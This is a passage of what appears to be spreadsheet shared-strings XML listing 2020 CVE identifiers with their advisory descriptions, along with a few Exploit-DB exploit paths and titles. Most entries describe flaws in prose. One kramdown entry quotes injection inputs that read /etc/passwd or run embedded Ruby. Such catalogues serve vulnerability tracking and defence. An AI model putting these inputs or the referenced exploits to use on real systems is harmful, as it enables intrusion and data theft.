    <t>The Ignition component before 2.0.5 for Laravel mishandles globals, _get, _post, _cookie, and _env. NOTE: in the 1.x series, versions 1.16.15 and later are unaffected as a consequence of the CVE-2021-43996 fix.</t>
  </si>
  <si>
    <t>CVE-2020-1391</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Agent Activation Runtime (AarSvc) fails to properly handle objects in memory, aka 'Windows Agent Activation Runtime Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13910</t>
  </si>
  <si>
    <t>Pengutronix Barebox through v2020.05.0 has an out-of-bounds read in nfs_read_reply in net/nfs.c because a field of an incoming network packet is directly used as a length field without any bounds check.</t>
  </si>
  <si>
    <t>CVE-2020-13911</t>
  </si>
  <si>
    <t>Your Online Shop 1.8.0 allows authenticated users to trigger XSS via a Change Name or Change Surname operation.</t>
  </si>
  <si>
    <t>CVE-2020-13912</t>
  </si>
  <si>
    <t>SolarWinds Advanced Monitoring Agent before 10.8.9 allows local users to gain privileges via a Trojan horse .exe file, because everyone can write to a certain .exe file.</t>
  </si>
  <si>
    <t>CVE-2020-13913</t>
  </si>
  <si>
    <t>An XSS issue in emfd in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to execute JavaScript code via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13914</t>
  </si>
  <si>
    <t>webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to cause a denial of service (Segmentation fault) to the webserver via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13915</t>
  </si>
  <si>
    <t>Insecure permissions in emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allow a remote attacker to overwrite admin credentials via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13916</t>
  </si>
  <si>
    <t>A stack buffer overflow in webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to execute code via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13917</t>
  </si>
  <si>
    <t>rkscli in Ruckus Wireless Unleashed through 200.7.10.92 allows a remote attacker to achieve command injection and jailbreak the CLI via a crafted CLI command. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13918</t>
  </si>
  <si>
    <t>Incorrect access control in webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to leak system information (that can be used for a jailbreak) via an unauthenticated crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-13919</t>
  </si>
  <si>
    <t>emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to achieve command injection via a crafted HTTP request. This affects C110, E510, H320, H510, M510, R320, R310, R500, R510 R600, R610, R710, R720, R750, T300, T301n, T301s, T310c, T310d, T310n, T310s, T610, T710, and T710s devices.</t>
  </si>
  <si>
    <t>CVE-2020-1392</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1388, CVE-2020-1394, CVE-2020-1395.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49927.py</t>
  </si>
  <si>
    <t>Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-13920</t>
  </si>
  <si>
    <t>Apache ActiveMQ uses LocateRegistry.createRegistry() to create the JMX RMI registry and binds the server to the "jmxrmi" entry. It is possible to connect to the registry without authentication and call the rebind method to rebind jmxrmi to something else. If an attacker creates another server to proxy the original, and bound that, he effectively becomes a man in the middle and is able to intercept the credentials when an user connects. Upgrade to Apache ActiveMQ 5.15.12.</t>
  </si>
  <si>
    <t>CVE-2020-13921</t>
  </si>
  <si>
    <t>**Resolved** Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.</t>
  </si>
  <si>
    <t>CVE-2020-13922</t>
  </si>
  <si>
    <t>Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another users password through the API interface.</t>
  </si>
  <si>
    <t>CVE-2020-13923</t>
  </si>
  <si>
    <t>IDOR vulnerability in the order processing feature from ecommerce component of Apache OFBiz before 17.12.04</t>
  </si>
  <si>
    <t>CVE-2020-13924</t>
  </si>
  <si>
    <t>In Apache Ambari versions 2.6.2.2 and earlier, malicious users can construct file names for directory traversal and traverse to other directories to download files.</t>
  </si>
  <si>
    <t>CVE-2020-13925</t>
  </si>
  <si>
    <t>Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then executes them on the server; while the reported API misses necessary input validation, which causes the hackers to have the possibility to execute OS command remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-13926</t>
  </si>
  <si>
    <t>Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is from system configurations, while the configuration can be overwritten by certain rest api, which makes SQL injection attack is possible. Users of all previous versions after 2.0 should upgrade to 3.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-13927</t>
  </si>
  <si>
    <t>The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default</t>
  </si>
  <si>
    <t>CVE-2020-13928</t>
  </si>
  <si>
    <t>Apache Atlas before 2.1.0 contain a XSS vulnerability. While saving search or rendering elements values are not sanitized correctly and because of that it triggers the XSS vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13929</t>
  </si>
  <si>
    <t>Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1393</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Diagnostics Hub Standard Collector Service fails to properly sanitize input, leading to an unsecure library-loading behavior, aka 'Windows Diagnostics Hub Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1418.</t>
  </si>
  <si>
    <t>CVE-2020-13931</t>
  </si>
  <si>
    <t>If Apache TomEE 8.0.0-M1 - 8.0.3, 7.1.0 - 7.1.3, 7.0.0-M1 - 7.0.8, 1.0.0 - 1.7.5 is configured to use the embedded ActiveMQ broker, and the broker config is misconfigured, a JMX port is opened on TCP port 1099, which does not include authentication. CVE-2020-11969 previously addressed the creation of the JMX management interface, however the incomplete fix did not cover this edge case.</t>
  </si>
  <si>
    <t>CVE-2020-13932</t>
  </si>
  <si>
    <t>In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.</t>
  </si>
  <si>
    <t>CVE-2020-13933</t>
  </si>
  <si>
    <t>Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2020-13934</t>
  </si>
  <si>
    <t>An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13935</t>
  </si>
  <si>
    <t>The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13936</t>
  </si>
  <si>
    <t>An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2.</t>
  </si>
  <si>
    <t>CVE-2020-13937</t>
  </si>
  <si>
    <t>Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.</t>
  </si>
  <si>
    <t>CVE-2020-13938</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.0 to 2.4.46 Unprivileged local users can stop httpd on Windows</t>
  </si>
  <si>
    <t>CVE-2020-1394</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Geolocation Framework handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1388, CVE-2020-1392, CVE-2020-1395.</t>
  </si>
  <si>
    <t>CVE-2020-13940</t>
  </si>
  <si>
    <t>In Apache NiFi 1.0.0 to 1.11.4, the notification service manager and various policy authorizer and user group provider objects allowed trusted administrators to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE).</t>
  </si>
  <si>
    <t>CVE-2020-13941</t>
  </si>
  <si>
    <t>Reported in SOLR-14515 (private) and fixed in SOLR-14561 (public), released in Solr version 8.6.0. The Replication handler (https://lucene.apache.org/solr/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler) allows commands backup, restore and deleteBackup. Each of these take a location parameter, which was not validated, i.e you could read/write to any location the solr user can access.</t>
  </si>
  <si>
    <t>CVE-2020-13942</t>
  </si>
  <si>
    <t>It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem.</t>
  </si>
  <si>
    <t>CVE-2020-13943</t>
  </si>
  <si>
    <t>If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.</t>
  </si>
  <si>
    <t>CVE-2020-13944</t>
  </si>
  <si>
    <t>In Apache Airflow &lt; 1.10.12, the "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit.</t>
  </si>
  <si>
    <t>CVE-2020-13945</t>
  </si>
  <si>
    <t>In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.</t>
  </si>
  <si>
    <t>CVE-2020-13946</t>
  </si>
  <si>
    <t>In Apache Cassandra, all versions prior to 2.1.22, 2.2.18, 3.0.22, 3.11.8 and 4.0-beta2, it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorised operations. Users should also be aware of CVE-2019-2684, a JRE vulnerability that enables this issue to be exploited remotely.</t>
  </si>
  <si>
    <t>CVE-2020-13947</t>
  </si>
  <si>
    <t>An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the message.jsp page of Apache ActiveMQ versions 5.15.12 through 5.16.0.</t>
  </si>
  <si>
    <t>CVE-2020-13948</t>
  </si>
  <si>
    <t>While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python’s `os` package in the web application process in versions &lt; 0.37.1. It was thus possible for an authenticated user to list and access files, environment variables, and process information. Additionally it was possible to set environment variables for the current process, create and update files in folders writable by the web process, and execute arbitrary programs accessible by the web process. All other operations available to the `os` package in Python were also available, even if not explicitly enumerated in this CVE.</t>
  </si>
  <si>
    <t>CVE-2020-13949</t>
  </si>
  <si>
    <t>In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1395</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Speech Brokered API handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1388, CVE-2020-1392, CVE-2020-1394.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49094.txt</t>
  </si>
  <si>
    <t>Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-13950</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.41 to 2.4.46 mod_proxy_http can be made to crash (NULL pointer dereference) with specially crafted requests using both Content-Length and Transfer-Encoding headers, leading to a Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-13951</t>
  </si>
  <si>
    <t>Attackers can use public NetTest web service of Apache OpenMeetings 4.0.0-5.0.0 to organize denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-13952</t>
  </si>
  <si>
    <t>In the course of work on the open source project it was discovered that authenticated users running queries against Hive and Presto database engines could access information via a number of templated fields including the contents of query description metadata database, the hashed version of the authenticated users’ password, and access to connection information including the plaintext password for the current connection. It would also be possible to run arbitrary methods on the database connection object for the Presto or Hive connection, allowing the user to bypass security controls internal to Superset. This vulnerability is present in every Apache Superset version &lt; 0.37.2.</t>
  </si>
  <si>
    <t>CVE-2020-13953</t>
  </si>
  <si>
    <t>In Apache Tapestry from 5.4.0 to 5.5.0, crafting specific URLs, an attacker can download files inside the WEB-INF folder of the WAR being run.</t>
  </si>
  <si>
    <t>CVE-2020-13954</t>
  </si>
  <si>
    <t>By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.</t>
  </si>
  <si>
    <t>CVE-2020-13955</t>
  </si>
  <si>
    <t>HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses internally this method to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.</t>
  </si>
  <si>
    <t>CVE-2020-13956</t>
  </si>
  <si>
    <t>Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.</t>
  </si>
  <si>
    <t>CVE-2020-13957</t>
  </si>
  <si>
    <t>Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.</t>
  </si>
  <si>
    <t>CVE-2020-13958</t>
  </si>
  <si>
    <t>A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target users file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler and other hyperlinks require a control-click.</t>
  </si>
  <si>
    <t>CVE-2020-13959</t>
  </si>
  <si>
    <t>The default error page for VelocityView in Apache Velocity Tools prior to 3.1 reflects back the vm file that was entered as part of the URL. An attacker can set an XSS payload file as this vm file in the URL which results in this payload being executed. XSS vulnerabilities allow attackers to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1396</t>
  </si>
  <si>
    <t>CVE-2020-13960</t>
  </si>
  <si>
    <t>D-Link DSL 2730-U IN_1.10 and IN_1.11 and DIR-600M 3.04 devices have the domain.name string in the DNS resolver search path by default, which allows remote attackers to provide valid DNS responses (and also offer Internet services such as HTTP) for names that otherwise would have had an NXDOMAIN error, by registering a subdomain of the domain.name domain name.</t>
  </si>
  <si>
    <t>CVE-2020-13961</t>
  </si>
  <si>
    <t>Strapi before 3.0.2 could allow a remote authenticated attacker to bypass security restrictions because templates are stored in a global variable without any sanitation. By sending a specially crafted request, an attacker could exploit this vulnerability to update the email template for both password reset and account confirmation emails.</t>
  </si>
  <si>
    <t>CVE-2020-13962</t>
  </si>
  <si>
    <t>Qt 5.12.2 through 5.14.2, as used in unofficial builds of Mumble 1.3.0 and other products, mishandles OpenSSL's error queue, which can cause a denial of service to QSslSocket users. Because errors leak in unrelated TLS sessions, an unrelated session may be disconnected when any handshake fails. (Mumble 1.3.1 is not affected, regardless of the Qt version.)</t>
  </si>
  <si>
    <t>CVE-2020-13963</t>
  </si>
  <si>
    <t>SOPlanning before 1.47 has Incorrect Access Control because certain secret key information, and the related authentication algorithm, is public. The key for admin is hardcoded in the installation code, and there is no key for publicsp (which is a guest account).</t>
  </si>
  <si>
    <t>CVE-2020-13964</t>
  </si>
  <si>
    <t>An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. include/rcmail_output_html.php allows XSS via the username template object.</t>
  </si>
  <si>
    <t>CVE-2020-13965</t>
  </si>
  <si>
    <t>An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.</t>
  </si>
  <si>
    <t>CVE-2020-13968</t>
  </si>
  <si>
    <t>CRK Business Platform &lt;= 2019.1 allows can inject SQL statements against the DB on any path using the 'strSessao' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13969</t>
  </si>
  <si>
    <t>CRK Business Platform &lt;= 2019.1 allows reflected XSS via erro.aspx on 'CRK', 'IDContratante', 'Erro', or 'Mod' parameter. This is path-independent.</t>
  </si>
  <si>
    <t>CVE-2020-1397</t>
  </si>
  <si>
    <t>CVE-2020-13970</t>
  </si>
  <si>
    <t>Shopware before 6.2.3 is vulnerable to a Server-Side Request Forgery (SSRF) in its "Mediabrowser upload by URL" feature. This allows an authenticated user to send HTTP, HTTPS, FTP, and SFTP requests on behalf of the Shopware platform server.</t>
  </si>
  <si>
    <t>CVE-2020-13971</t>
  </si>
  <si>
    <t>In Shopware before 6.2.3, authenticated users are allowed to use the Mediabrowser fileupload feature to upload SVG images containing JavaScript. This leads to Persistent XSS. An uploaded image can be accessed without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-13972</t>
  </si>
  <si>
    <t>Enghouse Web Chat 6.2.284.34 allows XSS. When one enters their own domain name in the WebServiceLocation parameter, the response from the POST request is displayed, and any JavaScript returned from the external server is executed in the browser. This is related to CVE-2019-16951.</t>
  </si>
  <si>
    <t>CVE-2020-13973</t>
  </si>
  <si>
    <t>OWASP json-sanitizer before 1.2.1 allows XSS. An attacker who controls a substring of the input JSON, and controls another substring adjacent to a SCRIPT element in which the output is embedded as JavaScript, may be able to confuse the HTML parser as to where the SCRIPT element ends, and cause non-script content to be interpreted as JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-13974</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel 4.4 through 5.7.1. drivers/tty/vt/keyboard.c has an integer overflow if k_ascii is called several times in a row, aka CID-b86dab054059. NOTE: Members in the community argue that the integer overflow does not lead to a security issue in this case.</t>
  </si>
  <si>
    <t>CVE-2020-13976</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in DD-WRT through 16214. The Diagnostic page allows remote attackers to execute arbitrary commands via shell metacharacters in the host field of the ping command. Exploitation through CSRF might be possible. NOTE: software maintainers consider the report invalid because it refers to an old software version, requires administrative privileges, and does not provide access beyond that already available to administrative users.</t>
  </si>
  <si>
    <t>CVE-2020-13977</t>
  </si>
  <si>
    <t>Nagios 4.4.5 allows an attacker, who already has administrative access to change the "URL for JSON CGIs" configuration setting, to modify the Alert Histogram and Trends code via crafted versions of the archivejson.cgi, objectjson.cgi, and statusjson.cgi files. NOTE: this vulnerability has been mistakenly associated with CVE-2020-1408.</t>
  </si>
  <si>
    <t>CVE-2020-13978</t>
  </si>
  <si>
    <t>** DISPUTED ** Monstra CMS 3.0.4 allows an attacker, who already has administrative access to modify .chunk.php files on the Edit Chunk screen, to execute arbitrary OS commands via the Theme Module by visiting the admin/index.php?id=themes&amp;action=edit_chunk URI. NOTE: there is no indication that the Edit Chunk feature was intended to prevent an administrator from using PHP's exec feature.</t>
  </si>
  <si>
    <t>CVE-2020-1398</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly handle Ease of Access dialog.An attacker who successfully exploited the vulnerability could execute commands with elevated permissions.The security update addresses the vulnerability by ensuring that the Ease of Access dialog is handled properly., aka 'Windows Lockscreen Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13980</t>
  </si>
  <si>
    <t>** DISPUTED ** OpenCart 3.0.3.3 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section because of a lack of entity encoding. NOTE: this issue exists because of an incomplete fix for CVE-2020-10596. The vendor states "this is not a massive issue as you are still required to be logged into the admin."</t>
  </si>
  <si>
    <t>CVE-2020-13984</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0. An infinite loop exists in the uIP TCP/IP stack component when processing IPv6 extension headers in ext_hdr_options_process in net/ipv6/uip6.c.</t>
  </si>
  <si>
    <t>CVE-2020-13985</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0. A memory corruption vulnerability exists in the uIP TCP/IP stack component when handling RPL extension headers of IPv6 network packets in rpl_remove_header in net/rpl/rpl-ext-header.c.</t>
  </si>
  <si>
    <t>CVE-2020-13986</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0. An infinite loop exists in the uIP TCP/IP stack component when handling RPL extension headers of IPv6 network packets in rpl_remove_header in net/rpl/rpl-ext-header.c.</t>
  </si>
  <si>
    <t>CVE-2020-13987</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0. An Out-of-Bounds Read vulnerability exists in the uIP TCP/IP Stack component when calculating the checksums for IP packets in upper_layer_chksum in net/ipv4/uip.c.</t>
  </si>
  <si>
    <t>CVE-2020-13988</t>
  </si>
  <si>
    <t>An issue was discovered in Contiki through 3.0. An Integer Overflow exists in the uIP TCP/IP Stack component when parsing TCP MSS options of IPv4 network packets in uip_process in net/ipv4/uip.c.</t>
  </si>
  <si>
    <t>CVE-2020-1399</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-13991</t>
  </si>
  <si>
    <t>vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.</t>
  </si>
  <si>
    <t>CVE-2020-13992</t>
  </si>
  <si>
    <t>An issue was discovered in Mods for HESK 3.1.0 through 2019.1.0. A Stored XSS issue allows remote unauthenticated attackers to abuse a helpdesk user's logged in session. A user with sufficient privileges to change their login-page image must open a crafted ticket.</t>
  </si>
  <si>
    <t>CVE-2020-13993</t>
  </si>
  <si>
    <t>An issue was discovered in Mods for HESK 3.1.0 through 2019.1.0. A blind time-based SQL injection issue allows remote unauthenticated attackers to retrieve information from the database via a ticket.</t>
  </si>
  <si>
    <t>CVE-2020-13994</t>
  </si>
  <si>
    <t>An issue was discovered in Mods for HESK 3.1.0 through 2019.1.0. A privileged user can achieve code execution on the server via a ticket because of improper access control of uploaded resources. This might be exploitable in conjunction with CVE-2020-13992 by an unauthenticated attacker.</t>
  </si>
  <si>
    <t>CVE-2020-13995</t>
  </si>
  <si>
    <t>U.S. Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable (sBuffer) leads to a Write-What-Where outcome. Writing beyond sBuffer will clobber most global variables until reaching a pointer such as DES_info or image_info. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer. The attacker can gain control of the instruction pointer.</t>
  </si>
  <si>
    <t>CVE-2020-13996</t>
  </si>
  <si>
    <t>The J2Store plugin before 3.3.13 for Joomla! allows a SQL injection attack by a trusted store manager.</t>
  </si>
  <si>
    <t>CVE-2020-13997</t>
  </si>
  <si>
    <t>In Shopware before 6.2.3, the database password is leaked to an unauthenticated user when a DriverException occurs and verbose error handling is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-13998</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Citrix XenApp 6.5, when 2FA is enabled, allows a remote unauthenticated attacker to ascertain whether a user exists on the server, because the 2FA error page only occurs after a valid username is entered. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-13999</t>
  </si>
  <si>
    <t>ScaleViewPortExtEx in libemf.cpp in libEMF (aka ECMA-234 Metafile Library) 1.0.12 allows an integer overflow and denial of service via a crafted EMF file.</t>
  </si>
  <si>
    <t>CVE-2020-1400</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1401, CVE-2020-1407.</t>
  </si>
  <si>
    <t>exploits/java/webapps/48793.py</t>
  </si>
  <si>
    <t>ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>2020-09-07</t>
  </si>
  <si>
    <t>CVE-2020-14000</t>
  </si>
  <si>
    <t>MIT Lifelong Kindergarten Scratch scratch-vm before 0.2.0-prerelease.20200714185213 loads extension URLs from untrusted project.json files with certain _ characters, resulting in remote code execution because the URL's content is treated as a script and is executed as a worker. The responsible code is getExtensionIdForOpcode in serialization/sb3.js. The use of _ is incompatible with a protection mechanism in older versions, in which URLs were split and consequently deserialization attacks were prevented. NOTE: the scratch.mit.edu hosted service is not affected because of the lack of worker scripts.</t>
  </si>
  <si>
    <t>CVE-2020-14001</t>
  </si>
  <si>
    <t>The kramdown gem before 2.3.0 for Ruby processes the template option inside Kramdown documents by default, which allows unintended read access (such as template="/etc/passwd") or unintended embedded Ruby code execution (such as a string that begins with template="string://&lt;%= `). NOTE: kramdown is used in Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.</t>
  </si>
  <si>
    <t>CVE-2020-14002</t>
  </si>
  <si>
    <t>PuTTY 0.68 through 0.73 has an Observable Discrepancy leading to an information leak in the algorithm negotiation. This allows man-in-the-middle attackers to target initial connection attempts (where no host key for the server has been cached by the client).</t>
  </si>
  <si>
    <t>CVE-2020-14004</t>
  </si>
  <si>
    <t>An issue was discovered in Icinga2 before v2.12.0-rc1. The prepare-dirs script (run as part of the icinga2 systemd service) executes chmod 2750 /run/icinga2/cmd. /run/icinga2 is under control of an unprivileged user by default. If /run/icinga2/cmd is a symlink, then it will by followed and arbitrary files can be changed to mode 2750 by the unprivileged icinga2 user.</t>
  </si>
  <si>
    <t>CVE-2020-14005</t>
  </si>
  <si>
    <t>Solarwinds Orion (with Web Console WPM 2019.4.1, and Orion Platform HF4 or NPM HF2 2019.4) allows remote attackers to execute arbitrary code via a defined event.</t>
  </si>
  <si>
    <t>CVE-2020-14006</t>
  </si>
  <si>
    <t>Solarwinds Orion (with Web Console WPM 2019.4.1, and Orion Platform HF4 or NPM HF2 2019.4) allows XSS via a Responsible Team.</t>
  </si>
  <si>
    <t>CVE-2020-14007</t>
  </si>
  <si>
    <t>Solarwinds Orion (with Web Console WPM 2019.4.1, and Orion Platform HF4 or NPM HF2 2019.4) allows XSS via a name of an alert definition.</t>
  </si>
  <si>
    <t>CVE-2020-14008</t>
  </si>
  <si>
